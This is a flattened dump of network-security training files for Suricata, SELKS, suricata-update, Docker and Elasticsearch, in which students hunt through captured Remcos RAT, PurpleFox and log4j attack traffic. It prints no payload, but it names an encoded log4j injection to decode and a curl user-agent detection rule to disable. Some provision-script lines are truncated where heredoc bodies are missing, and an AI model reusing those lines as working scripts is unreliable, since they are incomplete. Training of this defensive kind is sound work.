Remove all previous data from elasticsearch and suricata. (off by default) 66 | -a, --autofp, --no-autofp: Run in autofp mode instead of single mode. (off by default) 67 | -s, --set-rulefile: Set a file with signatures, which will be loaded together with the rules set in the yaml. (no default) 68 | -S, --set-rulefile-exclusive: Set a file with signatures, which will be loaded exclusively, regardless of the rules set in the yaml. (no default) 69 | -h, --help: Prints help 70 | 71 | Usage: readpcap.sh [OPTIONS] 72 | ``` 73 | 74 | To read a single PCAP file in Suricata `autofp` mode, use following command. Note the `-c` flag which also cleans up any previously existing data. 75 | 76 | ``` 77 | sudo ./scripts/readpcap.sh -ac /data/2021-01-06-Remcos-RAT-infection.pcap 78 | ``` 79 | 80 | By navigating to **hunt** section and selecting **all** from **time picker**, you should see something like this. 81 | 82 | ![Hunt view](hunt-pcap-read.png) 83 | 84 | # Suricata Analytics 85 | 86 | Suricata Analytics is a project by Stamus Networks to develop Jupyter notebooks for EVE data exploration and threat hunting. Project can be cloned from public github repo: 87 | 88 | ``` 89 | git clone https://github.com/StamusNetworks/suricata-analytics 90 | ``` 91 | 92 | Within the confines of this training, we recommend setting up a python virtual environment for `docker-compose`. 93 | 94 | ``` 95 | cd suricata-analytics 96 | python3 -m venv .venv 97 | source .venv/bin/activate 98 | pip install docker-compose 99 | ``` 100 | 101 | Then build the container locally. 102 | 103 | ``` 104 | docker-compose build 105 | ``` 106 | 107 | Before starting the stack, make sure to set up `.env` file. Simply copy the packaged reference. 108 | 109 | ``` 110 | cp .env.example .env 111 | ``` 112 | 113 | Then edit the file. 114 | * `SCIRIUS_TOKEN` can be found (or generated) in SELKS UI. Click on your username on top-right corner, go to `account settings`, then click `Edit Token` on left-hand menu under `User Settings` box. If the token is empty, simply click `Regenerate`. Then copy and paste the value into env file. 115 | * `SCIRIUS_HOST` will be the IP hosting SELKS instance. If using Vagrant, it will be the day3-selks box on `192.168.56.13` 116 | * `SCIRIUS_TLS_VERIFY` must be `no` since training setup uses default self-signed certificate 117 | 118 | ``` 119 | SCIRIUS_TOKEN= 120 | SCIRIUS_HOST=192.168.56.13 121 | SCIRIUS_TLS_VERIFY=no 122 | ``` 123 | 124 | Once this is done, start the docker env. 125 | 126 | ``` 127 | docker-compose up -d 128 | ``` 129 | 130 | You need API authentication token from jupyter logs. Search for the following lines: 131 | 132 | ``` 133 | (.venv) vagrant@day3-clean:~/suricata-analytics$ docker-compose logs 134 | ... 135 | stamus_jupyter | [I 2022-10-14 14:47:54.615 ServerApp] Use Control-C to stop this server and shut down all kernels (twice to skip confirmation). 136 | stamus_jupyter | [C 2022-10-14 14:47:54.617 ServerApp] 137 | stamus_jupyter | 138 | stamus_jupyter | To access the server, open this file in a browser: 139 | stamus_jupyter | file:///home/jovyan/.local/share/jupyter/runtime/jpserver-6-open.html 140 | stamus_jupyter | Or copy and paste one of these URLs: 141 | stamus_jupyter | http://8ed1eee366bf:8888/lab?token=0c7c34ada0ad6243decb1dcbb3654c1b9de2b423a10d2678 142 | stamus_jupyter | or http://127.0.0.1:8888/lab?token=0c7c34ada0ad6243decb1dcbb3654c1b9de2b423a10d2678 143 | ``` 144 | 145 | Note that you must modify the IP to reflect your server. Meaning that `http://127.0.0.1:8888/lab?token=0c7c34ada0ad6243decb1dcbb3654c1b9de2b423a10d2678` becomes `http://192.168.56.13:8888/lab?token=0c7c34ada0ad6243decb1dcbb3654c1b9de2b423a10d2678` (if using vagrant env). 146 | 147 | # Tasks 148 | 149 | * get SELKS up and running 150 | * set up rule server with `python3 -m http.server` 151 | * set up a rule source in scirius and attach it to suricata 152 | * enable `tgreen/hunting` ruleset 153 | * import `2021-01-06-Remcos-RAT-infection` 154 | * what is the malicious domain used for stage1? 155 | * find the malicious EXE 156 | * what is the IP used to serve it? 157 | * import `2021-01-05-PurpleFox-EK-and-post-infection-traffic` 158 | * what is the IoC for malicious host? 159 | * look into `flow` records, does anything seem strange? 160 | * import `2022-01-01-thru-03-server-activity-with-log4j-attempts` 161 | * find encoded log4j script injection 162 | * decode it 163 | 164 | -------------------------------------------------------------------------------- /Suricata/selks/hunt-pcap-read.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ccdcoe/CDMCS/6ab06382f915e8ea0c54963876cbe42b7b37c4fb/Suricata/selks/hunt-pcap-read.png -------------------------------------------------------------------------------- /Suricata/suricata-update/README.md: -------------------------------------------------------------------------------- 1 | # suricata-update 2 | 3 | This section **does not** assume any knowledge about Suricata YAML configuration. Some references to it will be made. But student should be able to repeat all examples without touching the configuration file. 4 | 5 | However, the student should be familiar with: 6 | * Using Suricata with CLI flags (`-S`, `-l`, `-r`, `--af-packet=$IFACE`); 7 | * Parsing offline PCAP files / simple traffic replay; 8 | * Rule file, loading that rule file with `-S`; 9 | * Exploring `eve.json` using `jq`; 10 | * Suricata rulesets, downloading them manually, rule file layout, loading ruleset with `-S`; 11 | 12 | * https://suricata.readthedocs.io/en/latest/rule-management/suricata-update.html 13 | * https://suricata-update.readthedocs.io/en/latest/ 14 | 15 | ## Background 16 | 17 | * Downloading rules for first time is easy 18 | * But ongoing rule management (on CLI) used to be a pain 19 | * People had to use oldschool Snort tools like Oinkmaster or pulledpork 20 | * Or write their own update scripts 21 | * Trickier than it sounds, as rule manager needs to: 22 | * Download rules (from multiple sources) 23 | * Disable and modify rules according to your use cases 24 | * Ensure that next rule update does not overwrite yesterdays modifications! 25 | * No modern lightweight tools existed 26 | 27 | ## Enter suricata-update 28 | 29 | Now there's a modern tool directly from Suricata dev team. It's called `suricata-update`. It's provided with suricata 30 | sources and it is also very easy to install with `pip` 31 | 32 | ``` 33 | apt-get install python3-pip 34 | python3 -m pip install --upgrade --user suricata-update 35 | ``` 36 | 37 | First thing, check the `--help` flag. It has quite a lot functionality. 38 | 39 | ``` 40 | $HOME/.local/bin/suricata-update --help 41 | ``` 42 | 43 | ### Adding a source 44 | 45 | Predefined sources can be listed with `list-sources` subcommand. 46 | 47 | ``` 48 | $HOME/.local/bin/suricata-update list-sources 49 | ``` 50 | 51 | By default, only `et/open` is enabled. Other rule sources can be enabled with `enable-source` subcommand, with source name (that you found via `list-sources`) following that command. 52 | 53 | ``` 54 | $HOME/.local/bin/suricata-update enable-source tgreen/hunting 55 | ``` 56 | 57 | Note that default working directory for suricata-update is `/var/lib/suricata`. However, you might be running it as regular user. And you should be. **Downloading or modifying ruleset does not require admin privileges.** Permissions only come into play when reloading Suricata itself. 58 | 59 | Working directory can easily be overridden with `-D` flag. If you see **permission denied** or **working dir missing**, keep in mind that you can just use something else! And whatever you choose is up to you! 60 | 61 | ``` 62 | $HOME/.local/bin/suricata-update enable-source tgreen/hunting -D $WORKING_DIR 63 | ``` 64 | 65 | Calling `suricata-update` with no subcommand would then download all rules and merge them into `suricata.rules` in working directory of your choice. 66 | 67 | ``` 68 | $HOME/.local/bin/suricata-update -D $WORKING_DIR 69 | cat $WORKING_DIR/rules/suricata.rules | wc -l 70 | ``` 71 | 72 | Rule directory is usually defined in `suricata.yaml`. But again, you can just use `-S` to point Suricata directly to it. 73 | 74 | ``` 75 | default-rule-path: $WORKING_DIR/rules 76 | rule-files: 77 | - suricata.rules 78 | ``` 79 | 80 | ``` 81 | suricata -S $WORKING_DIR/rules/suricata.rules $OPTS 82 | ``` 83 | 84 | ### Disabling a source 85 | 86 | Disabling a source simply means calling `remove-source`, re-running update and reloading Suricata. 87 | 88 | ``` 89 | suricata-update remove-source tgreen/hunting -D $WORKING_DIR 90 | ``` 91 | 92 | ``` 93 | $HOME/.local/bin/suricata-update -D $WORKING_DIR 94 | ``` 95 | 96 | ### Configuration files 97 | 98 | `suricata-update` can parse multiple config files to apply ruleset transformations. Use `--dump-sample-configs` to have suricata-update dump their skeletons to local folder. Good idea is to create a separate clean folder for them. 99 | 100 | ``` 101 | mkdir configs 102 | cd configs 103 | suricata-update --dump-sample-configs 104 | ``` 105 | 106 | It will give you: 107 | * `update.yaml` for suricata-update itself; 108 | * `disable.conf` for disabling rules, SIDs, rule categories, rule files, etc; 109 | * `enable.conf` for the reverse; 110 | * `drop.conf` for IPS `drop` conversion; 111 | * `modify.conf` for rule customizations; 112 | * `threshold.in` for threshold setup; 113 | 114 | For example, `malware.rules` can be disabled with following content in `disable.conf`. Just a sample, that's actually one rule category you don't want to disable! 115 | 116 | ``` 117 | group: emerging-malware.rules 118 | ``` 119 | 120 | Then run `suricata-update` while pointing it toward `disable.conf`. 121 | 122 | ``` 123 | $HOME/.local/bin/suricata-update -D $WORKING_DIR --disable-conf disable.conf 124 | ``` 125 | 126 | # Exercise 127 | 128 | * Select your own folder where the rules should be located. 129 | * Following rulesets should be activated: 130 | * `et/open` 131 | * `oisf/trafficid` 132 | * `ptresearch/attackdetection` 133 | * `tgreen/hunting` 134 | * Disable following rules: 135 | * Outbound Curl user-agent; 136 | * apt and yum package management; 137 | * Unix and BSD ping; 138 | * Suricata STREAM rules; 139 | * Write a crontab script that updates your ruleset and invokes suricata rule reload **without restarting it**; 140 | * Generate a simple report of unique alerts with counts per MTA PCAP; 141 | -------------------------------------------------------------------------------- /Suricata/unix-socket/README.md: -------------------------------------------------------------------------------- 1 | # Suricata Unix Socket 2 | 3 | This section **does not** assume any knowledge about Suricata YAML configuration. Some references to it will be made. But student should be able to repeat all examples without touching the configuration file. 4 | 5 | However, the student should be familiar with: 6 | * Using Suricata with CLI flags (`-S`, `-l`, `-r`, `--af-packet=$IFACE`); 7 | * Parsing offline PCAP files / simple traffic replay; 8 | * Rule file, loading that rule file with `-S`; 9 | * Exploring `eve.json` using `jq`; 10 | 11 | ## Background 12 | 13 | * Restarting suricata is a no no. If you have a lot of rules, this will take a long time 14 | * You would not want to miss anything, would you? 15 | 16 | ## Suricata can listen to a unix socket and accept commands from the user. 17 | 18 | see: 19 | * https://suricata.readthedocs.io/en/latest/unix-socket.html 20 | * https://suricata.readthedocs.io/en/latest/rule-management/rule-reload.html 21 | * https://home.regit.org/2012/09/a-new-unix-command-mode-in-suricata/ 22 | * https://github.com/inliniac/suricata/blob/89ba5816dc303d54741bdfd0a3896c7c1ce50d91/src/unix-manager.c#L922 23 | 24 | Unix socket can be enabled in YAML config. Note that this should be enabled by default, so current section does not require user to set it up. 25 | 26 | ``` 27 | unix-command: 28 | enabled: auto 29 | #filename: custom.socket 30 | ``` 31 | 32 | ## Using unix-socket mode 33 | 34 | Suricata has many runmodes. Student should already be familiar with `pcap reader` and `af-packet`. However, former will exit as soon as PCAP read is done and latter requires higher privileges with traffic generation to live interface. Both would need to *heat up* the ruleset first. Which is not ideal if you want to process a lot of PCAPs, debug large rulesets, etc. 35 | 36 | Solution is to launch suricata in unix socket mode. 37 | 38 | ``` 39 | suricata --unix-socket 40 | suricatasc 41 | ``` 42 | 43 | Note that Suricata would create unix socket regardless of runmode. However, explicit unix socket mode has a few benefits. Many were already mentioned in last paragraph, but this runmode will also enable commands that are unavailable in other runmodes. 44 | 45 | Most importantly, you will be able to feed PCAPs along with respective output folders directly to Suricata process running in userspace. Great for network forensics 46 | 47 | ``` 48 | suricatasc -c capture-mode 49 | suricatasc -c "pcap-file $PCAP $LOG_DIR" 50 | ``` 51 | 52 | ## Looping over values in bash 53 | 54 | ``` 55 | for pcap in `find /$PCAP_DIR -type f -name '*.pcap'` ; do 56 | suricatasc -c "pcap-file $pcap $LOG_DIR/$PCAP" 57 | done 58 | ``` 59 | 60 | ## Tasks 61 | 62 | * Start suricata in unix-socket runmode 63 | * Parse all MTA PCAPs! 64 | -------------------------------------------------------------------------------- /Suricata/vagrant/README.md: -------------------------------------------------------------------------------- 1 | # Vagrant boxes 2 | 3 | see: [Our vagrant tutorial for reference and usage](/common/vagrant). 4 | 5 | ## Day1 6 | 7 | * [GOTO](/Suricata/vagrant/day1) 8 | 9 | A simple minimal VM with Suricata preinstalled. Nothing needs to be set up, student can get straight to work with rules and CLI usage. 10 | 11 | ## Day2 12 | 13 | * [GOTO](/Suricata/vagrant/day2) 14 | 15 | Blank VM. Students have to build and configure Suricata themselves. 16 | 17 | ## Day3 18 | 19 | * [GOTO](/Suricata/vagrant/day3) 20 | 21 | Multi-VM setup with appliance setup. First one is for setting up SELKS dockerized appliance. Second is a blank VM for custom elastic setup (if interest) or for jupyter notebook hosting. 22 | -------------------------------------------------------------------------------- /Suricata/vagrant/day1/Vagrantfile: -------------------------------------------------------------------------------- 1 | # -*- mode: ruby -*- 2 | # vi: set ft=ruby : 3 | 4 | NAME = 'day1'.freeze 5 | MEM = 1024 6 | CPU = 4 7 | 8 | Vagrant.configure(2) do |config| 9 | config.vm.define NAME do |box| 10 | box.vm.box = 'generic/ubuntu2004' 11 | box.vm.hostname = NAME 12 | box.vm.synced_folder '..', '/vagrant' 13 | box.vm.synced_folder '../../', '/cdmcs-suricata' 14 | box.vm.synced_folder '../../../data/', '/data' 15 | box.vm.network :private_network, ip: '192.168.56.11' 16 | box.vm.provider :virtualbox do |vb| 17 | vb.customize ['modifyvm', :id, '--memory', MEM] 18 | vb.customize ['modifyvm', :id, '--cpus', CPU] 19 | end 20 | box.vm.provision 'docker', images: [] 21 | box.vm.provision 'shell', path: 'provision.sh' 22 | end 23 | end 24 | -------------------------------------------------------------------------------- /Suricata/vagrant/day1/provision.sh: -------------------------------------------------------------------------------- 1 | 2 | FILE=/etc/sysctl.conf 3 | grep "disable_ipv6" $FILE || cat >> $FILE <> $FILE < /dev/null 2>&1 \ 20 | && apt-get update > /dev/null \ 21 | && apt-get install -y suricata > /dev/null 22 | 23 | systemctl stop suricata.service 24 | systemctl disable suricata.service 25 | 26 | echo "Adding detects for SURICATA" 27 | FILE=/etc/suricata/cdmcs-detect.yaml 28 | grep "CDMCS" $FILE || cat >> $FILE <> $FILE <> $FILE < Go, also known as golang, is a computer programming language whose development began in 2007 at Google, and it was introduced to the public in 2009. Golang was explicitly engineered to thrive in projects built by large groups of programmers with different skill levels. 4 | > Concurrency, easy one binary deploy with yet fast build times. 5 | 6 | # go setup 7 | 8 | ``` 9 | 10 | GOLANG="go1.10.linux-amd64.tar.gz" 11 | 12 | cd /tmp 13 | wget -q -4 https://storage.googleapis.com/golang/$GOLANG 14 | tar -zxvf $GOLANG -C /usr/local/ > /dev/null 2>&1 15 | echo 'export GOROOT=/usr/local/go' >> ~/.bashrc 16 | echo 'export GOPATH=/opt/go' >> ~/.bashrc 17 | echo 'export PATH=$PATH:$GOROOT/bin:$GOPATH/bin' >> ~/.bashrc 18 | export GOROOT=/usr/local/go 19 | export GOPATH=/opt/go 20 | export PATH=$PATH:$GOROOT/bin:$GOPATH/bin 21 | mkdir -p /opt/go 22 | cd /opt/go 23 | go version 24 | go env 25 | 26 | ``` 27 | -------------------------------------------------------------------------------- /common/certstream-mining.md: -------------------------------------------------------------------------------- 1 | ## Cert Transparency overview 2 | 3 | https://www.certificate-transparency.org/ 4 | 5 | ## An attempt with Naive Bayes and RF 6 | 7 | https://github.com/sulliwan/mustmets 8 | 9 | * Uses Google safebrowsing and various DNSBL-s to check domains for blacklists 10 | * Takes a lexicon of "suspicious words" 11 | * Converts the certstream to a binary bag of words per domain name 12 | * Attempts to train classifiers on that data 13 | 14 | ## Actually working example 15 | 16 | https://github.com/x0rz/phishing_catcher 17 | 18 | * Uses a custom ruleset to calculate a score per domain 19 | 20 | ## Main problems 21 | 22 | * There is actually very little data in the stream, mostly just the domain name which is interesting 23 | * Very unbalanced dataset (proportion of phishing/malware domains to legit domains is very low) 24 | * Future problem: Let's Encrypt will issue wildcard certs, which reduce the amount of meaningful data even further 25 | -------------------------------------------------------------------------------- /common/day_intro.md: -------------------------------------------------------------------------------- 1 | # Intro 2 | 3 | * [CCDCOE](https://www.youtube.com/watch?v=afu7r7G2res) 4 | * Course 5 | * Designed as hands-on classroom course 6 | * *from techies for techies* 7 | * Tentative timeline, rearranging topics as needed 8 | * Building 9 | * Classroom 10 | * No slides, only markdown, Vagrantfiles and instructors in classroom 11 | * Assistance 12 | * Make students go through painful troubleshooting on purpose! 13 | * You don't store this knowledge from listening to lectures or copy-pasting commands 14 | * Coffee breaks 15 | * Get a coffee/tea/break when you need it 16 | * Lunch 17 | * Smoking 18 | * Social 19 | * Admin remarks 20 | 21 | ## Tooling 22 | 23 | * GitHub 24 | * Vagrant (optionally) 25 | * Linux 26 | * Command line 27 | * Docker 28 | * Jupyter notebooks 29 | -------------------------------------------------------------------------------- /common/docker/README.md: -------------------------------------------------------------------------------- 1 | # Docker 2 | 3 | * https://docs.docker.com/get-started/ 4 | * https://docs.docker.com/compose/gettingstarted/ 5 | * https://docs.docker.com/engine/reference/builder/ 6 | 7 | ## Docker is 8 | * an application containerization tool 9 | * not a virtualization platform (container contents are executed on host) 10 | 11 | ## Install 12 | * https://docs.docker.com/install/linux/docker-ce/ubuntu/ 13 | * https://wiki.archlinux.org/index.php/Docker 14 | 15 | ## install docker-ce on ubuntu 16 | 17 | Always use up to date version of docker engine. 18 | 19 | ``` 20 | curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add - 21 | sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" 22 | ``` 23 | ``` 24 | apt-get update && apt-get install docker-ce 25 | ``` 26 | ``` 27 | systemctl start docker 28 | systemctl enable docker 29 | ``` 30 | 31 | ## List images on system 32 | 33 | Docker is designed around images which are in turn used to deploy new containers. An image is simply a stack of virtual file system diffs layered upon each other. In other words, deploying a new container does not copy base image data as is often the case with virtual machines, but only creates a volatile diff. 34 | 35 | Locally present images can be listed with following command. 36 | 37 | ``` 38 | docker images 39 | ``` 40 | 41 | ## Pull image from public repository 42 | 43 | * https://docs.docker.com/engine/reference/commandline/run/ 44 | 45 | New images can be pulled from public or private registries. Pull can be done explicitly with `docker pull` but us not needed. Invoking `docker run` on locally missing container will cause the deamon to automatically pull the image if it exists in configured registry. [Docker hub](https://hub.docker.com/) is used by default. So be careful what you pull. Each image can have tags. In other words, `debian:stretch` and `debian:jessie` are not two distinct images, but rather two versions of the same container. 46 | 47 | ``` 48 | docker pull debian:stretch 49 | docker run -ti --rm --name firstcontainer debian:stretch 50 | ``` 51 | 52 | ## Execute any command inside running container 53 | 54 | You can enter a running container with `exec` subcommand. Note that `-ti` is needed to keep console stdout open. Containers can be entered using container `--name` or id that can be found using `docker ps` command. Container that does not have explicit name configured will get a random name from the daemon. 55 | 56 | ``` 57 | docker exec -ti firstcontainer /bin/bash 58 | ``` 59 | 60 | ## Building a new container 61 | 62 | * https://docs.docker.com/engine/reference/builder/ 63 | 64 | Containers are not configured nor used manually. Exec should only be used to debug build or networking issues. Custom images are built using a `Dockerfile`. 65 | 66 | ``` 67 | vim $PWD/Dockerfile 68 | ``` 69 | 70 | Each line in Dockerfile corresponds to a differential file system layer. The following command `apt-get` is written as one line because this approach will update the cache temporarily during build time, install bash shell and then clean up local package manager cache. Installed package would remain in the image by cache will not. In other words, separating `install` and `autoremove` commands to two distinct lines would result in package cache remain in the first layer and therefore the image size will be significantly larger. 71 | 72 | ``` 73 | FROM debian:stretch 74 | 75 | RUN apt-get update && apt-get install -y bash && apt-get -y autoremove && apt-get -y autoclean 76 | 77 | CMD /bin/bash -c "echo useless" 78 | ``` 79 | 80 | Build command can then be executed in local directory, defined by `.`. 81 | 82 | ``` 83 | docker build -t local/useless . 84 | ``` 85 | 86 | ## Run multiple containers 87 | 88 | * https://docs.docker.com/compose/ 89 | 90 | Many methods exist to run multiple containers. For example, a web site usually depends on a database. A correct *docker way* would be to separate those two into two distinct containers, as each container is designed to handle a single application with `PID` 1. 91 | 92 | ``` 93 | apt-get install docker-compose 94 | #python3 -m pip install --user --upgrade docker-compose 95 | vim docker-compose.yml 96 | ``` 97 | ``` 98 | version: '3' 99 | services: 100 | web: 101 | image: httpd 102 | ports: 103 | - "5000:5000" 104 | redis: 105 | image: "redis:alpine" 106 | ``` 107 | ``` 108 | docker-compose up 109 | ``` 110 | 111 | ## Networking 112 | 113 | Docker containers are relegated to private bridge networks. A single container that does not have `--network` flag defined would therefore be assigned to a private network. Services inside containers are exposed to host using port forwarding. 114 | 115 | The following command would forward local port 88 to internal container port 80 when starting a web server. 116 | 117 | ``` 118 | docker run -ti -p localhost:88:80 httpd 119 | ``` 120 | 121 | Existing networks can be seen using `docker network ls` command. Following commands would create a new network with `bridge` driver and add two elastic stack containers there. 122 | 123 | ``` 124 | DOCKER_ELA="docker.elastic.co/elasticsearch/elasticsearch-oss:6.5.4" 125 | DOCKER_KIBANA="docker.elastic.co/kibana/kibana-oss:6.5.4" 126 | 127 | docker network create -d bridge cdmcs 128 | docker run -it -d --name elastic -h elastic --network cdmcs -p 127.0.0.1:9200:9200 $DOCKER_ELA 129 | docker run -it -d --name kibana -h kibana --network cdmcs -e "ELASTICSEARCH_URL=http://elastic:9200" -p 5601:5601 $DOCKER_KIBANA 130 | ``` 131 | 132 | Note that containers commonly allow configuration via environmental variables. This support has to be built into individual container, so refer to image documentation for supported variables. In this example, `ELASTICSEARCH_URL` configures connection URL in kibana container to be `http://elastic:9200`, whereas *elastc* refers to `--name` of first container. Internal docker proxy will handle the name resolution as container internal IP addresses are assigned dynamically. Note that `-h` sets the internal hostname string for container. This has no effect on name resolution, but cab be useful for logging as syslog hostname field would be randomly generated string that is not consistent between container redeployments. 133 | 134 | Note that docker-compose will automatically handle this common network unless explicitly configured. 135 | 136 | ## Persistence 137 | 138 | Docker file system is volatile and should only be used to store application code, dependencies, and critical system tools and libraries. No data should be stored there unless it is for testing or development! Furthermore, Docker file system layers can degrade the performance of IO intensive application. 139 | 140 | A simple solution would be to map a local file system folder as docker volume with `-v` flag. 141 | 142 | ``` 143 | docker run -it -d -v /home/user/appdata:/usr/share/elasticsearch/data -p 127.0.0.1:9200:9200 $DOCKER_ELA 144 | ``` 145 | 146 | Note that *UID* inside the container must have write permissions to the host folder, otherwise the app will fail. It is possible to also remap the UID via docker command line flags, but a proper way to handle this is to create a dedicated volume. 147 | 148 | ``` 149 | docker volume create myvol 150 | docker run -it -d -v myvol:/usr/share/elasticsearch/data -p 127.0.0.1:9200:9200 $DOCKER_ELA 151 | ``` 152 | 153 | Note that this volume is not using docker virtual filesystems and is actually kept separate on host filesystem (unless using alternative drivers). Verify the data by looking into docker data dir. 154 | 155 | ``` 156 | ls -lah /var/lib/docker/volumes/ 157 | ``` 158 | -------------------------------------------------------------------------------- /common/elastic/README.md: -------------------------------------------------------------------------------- 1 | # elastic stack 2 | 3 | ## E and L and K 4 | * https://www.elastic.co/guide/en/elastic-stack/current/elastic-stack.html 5 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/_basic_concepts.html 6 | * https://www.elastic.co/guide/en/logstash/6.1/pipeline.html 7 | * https://www.elastic.co/guide/en/kibana/6.x/introduction.html 8 | 9 | ## E without L 10 | * http://www.rsyslog.com/doc/v8-stable/configuration/modules/omelasticsearch.html 11 | * https://raw.githubusercontent.com/markuskont/salt-elasticsearch/master/tests/json2ela.py 12 | * https://github.com/markuskont/salt-elasticsearch/blob/master/tests/shipper.js 13 | * https://elasticsearch-py.readthedocs.io/en/master/ 14 | * https://github.com/elastic/elasticsearch-js 15 | * https://github.com/olivere/elastic 16 | * [python example](elastic.shipper.py) 17 | 18 | ## E with other friends 19 | * [kafka](https://www.elastic.co/blog/just-enough-kafka-for-the-elastic-stack-part1) 20 | * [redis](https://www.elastic.co/blog/just_enough_redis_for_logstash) 21 | * [docker](docker-compose.yml) 22 | * [vagrant](https://github.com/markuskont/salt-elasticsearch) 23 | -------------------------------------------------------------------------------- /common/elastic/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.2' 2 | services: 3 | elasticsearch: 4 | image: docker.elastic.co/elasticsearch/elasticsearch-oss:6.1.2 5 | container_name: elasticsearch 6 | ports: 7 | - "9200:9200" 8 | #- "9300:9300" 9 | environment: 10 | #- cluster.name=docker-cluster 11 | - "ES_JAVA_OPTS=-Xmx16g -Xms16g" 12 | ulimits: 13 | memlock: 14 | soft: -1 15 | hard: -1 16 | volumes: 17 | - type: bind 18 | source: /srv/pcap/elasticsearch 19 | target: /usr/share/elasticsearch/data 20 | kibana: 21 | image: docker.elastic.co/kibana/kibana-oss:6.1.2 22 | container_name: kibana 23 | ports: 24 | - "5601:5601" 25 | depends_on: 26 | - elasticsearch 27 | logstash: 28 | image: docker.elastic.co/logstash/logstash-oss:6.1.2 29 | container_name: logstash 30 | depends_on: 31 | - elasticsearch 32 | volumes: 33 | - ./logstash-redis-ela.conf:/usr/share/logstash/pipeline/logstash.conf 34 | redis: 35 | image: redis 36 | container_name: redis 37 | ports: 38 | - "6379:6379" 39 | -------------------------------------------------------------------------------- /common/elastic/elastic.api.md: -------------------------------------------------------------------------------- 1 | # Elasticsearch API 2 | 3 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/docs.html 4 | * https://elasticsearch-py.readthedocs.io/en/master/ 5 | * https://www.elastic.co/guide/en/elasticsearch/client/javascript-api/current/api-reference.html 6 | * https://github.com/olivere/elastic 7 | * https://gist.github.com/markuskont/1cfffc8c813806364200ecf2fa7eaaad 8 | * https://gist.github.com/markuskont/499ee5113ecaf63e7f98c8a4b2343f1f 9 | -------------------------------------------------------------------------------- /common/elastic/elastic.config.basic.md: -------------------------------------------------------------------------------- 1 | # basic configuration 2 | 3 | ## JVM heap size 4 | 5 | * rule of thumb is 50% available memory 6 | * not so important when just testing [(amount of data matters)](https://www.elastic.co/blog/found-understanding-memory-pressure-indicator) 7 | * https://www.elastic.co/guide/en/elasticsearch/guide/current/heap-sizing.html 8 | 9 | ``` 10 | vim /etc/elasticsearch/jvm.options 11 | ``` 12 | 13 | ``` 14 | -Xms1g 15 | -Xmx1g 16 | ``` 17 | 18 | ## rename 19 | 20 | * not really needed but becomes important later for clustered setup 21 | 22 | ``` 23 | vim /etc/elasticsearch/elasticsearch.yml 24 | ``` 25 | 26 | ``` 27 | cluster.name: CDMCS 28 | node.name: babbysfirstelasticsearch 29 | ``` 30 | 31 | ## data directory 32 | 33 | * default is fine, but example may be useful if you need to add disks to existing boxes 34 | * [though this was not so nice](https://www.elastic.co/blog/multi-data-path-bug-in-elasticsearch-5-3-0) 35 | * does not do striping! 36 | * you cannot allocate shards to specific disks! 37 | 38 | ``` 39 | mkdir -p /srv/elasticsearch/{0,1} 40 | chown elasticsearch /srv/elasticsearch/{0,1} 41 | ``` 42 | ``` 43 | path.data: /srv/elasticsearch/0,/srv/elasticsearch/1 44 | ``` 45 | 46 | ``` 47 | ls -lah /srv/elasticsearch/*/nodes/* 48 | ``` 49 | 50 | ## log directory 51 | 52 | * do not leave unconfigured 53 | 54 | ``` 55 | path.logs: /var/log/elasticsearch 56 | ``` 57 | 58 | ## roles 59 | 60 | * all roles should be enabled on single node 61 | 62 | ``` 63 | http.host: 127.0.0.1 64 | 65 | node.data: true 66 | node.ingest: true 67 | node.master: true 68 | ``` 69 | 70 | ---- 71 | 72 | next -> [creating your first template](elastic.mappings.md) 73 | -------------------------------------------------------------------------------- /common/elastic/elastic.config.example.md: -------------------------------------------------------------------------------- 1 | # Elasticsearch config 2 | 3 | ``` 4 | cluster: 5 | name: josephine 6 | discovery: 7 | zen: 8 | ping: 9 | unicast: 10 | hosts: 11 | - 192.168.10.120 12 | - 192.168.10.82 13 | - 192.168.10.122 14 | http: 15 | enabled: true 16 | host: 0.0.0.0 17 | network: 18 | host: 192.168.10.140 19 | node: 20 | data: false 21 | ingest: false 22 | master: false 23 | name: es-proxy-0.labor.sise 24 | path: 25 | data: 26 | - /srv/elasticsearch/0 27 | - /srv/elasticsearch/1 28 | logs: /var/log/elasticsearch 29 | ``` 30 | -------------------------------------------------------------------------------- /common/elastic/elastic.ingest.md: -------------------------------------------------------------------------------- 1 | # Elasticsearch Ingest node 2 | 3 | * https://www.elastic.co/guide/en/elasticsearch/reference/master/ingest.html 4 | * https://www.elastic.co/guide/en/elasticsearch/reference/master/ingest-processors.html 5 | * https://www.elastic.co/guide/en/elasticsearch/plugins/master/ingest.html 6 | 7 | 8 | ``` 9 | /usr/share/elasticsearch/bin/elasticsearch-plugin install ingest-geoip 10 | ``` 11 | 12 | ``` 13 | { 14 | "description": "Enrich Suricata logs with GeoIP", 15 | "processors": [ 16 | { 17 | "geoip" : { "field": "src_ip", "target_field": "src_geoip" } 18 | }, 19 | { 20 | "geoip" : { "field": "dest_ip", "target_field": "dest_geoip" } 21 | } 22 | ] 23 | } 24 | ``` 25 | 26 | ``` 27 | curl -XPUT localhost:9200/_ingest/pipeline/suricata -d @suricata_pipe.json 28 | ``` 29 | -------------------------------------------------------------------------------- /common/elastic/elastic.install.md: -------------------------------------------------------------------------------- 1 | # install elasticsearch 2 | 3 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/_installation.html 4 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/deb.html 5 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/docker.html 6 | 7 | ## install java 8 8 | 9 | ### openjdk (only for testing) 10 | ``` 11 | apt-get -y install openjdk-8-jre-headless 12 | ``` 13 | 14 | ### oracle java 15 | ``` 16 | install_oracle_java() { 17 | echo "Installing oracle Java" 18 | echo 'oracle-java8-installer shared/accepted-oracle-license-v1-1 boolean true' | debconf-set-selections \ 19 | && add-apt-repository ppa:webupd8team/java \ 20 | && apt-get update > /dev/null \ 21 | && apt-get -y install oracle-java8-installer > /dev/null 22 | } 23 | ``` 24 | 25 | ## deb package 26 | ```bash 27 | ELASTICSEARCH="elasticsearch-6.1.2.deb" 28 | 29 | [[ -f $ELASTICSEARCH ]] || wget -4 https://artifacts.elastic.co/downloads/elasticsearch/$ELASTICSEARCH 30 | dpkg -i $ELASTICSEARCH 31 | systemctl enable elasticsearch 32 | systemctl start elasticsearch 33 | ``` 34 | 35 | ## test it 36 | 37 | ``` 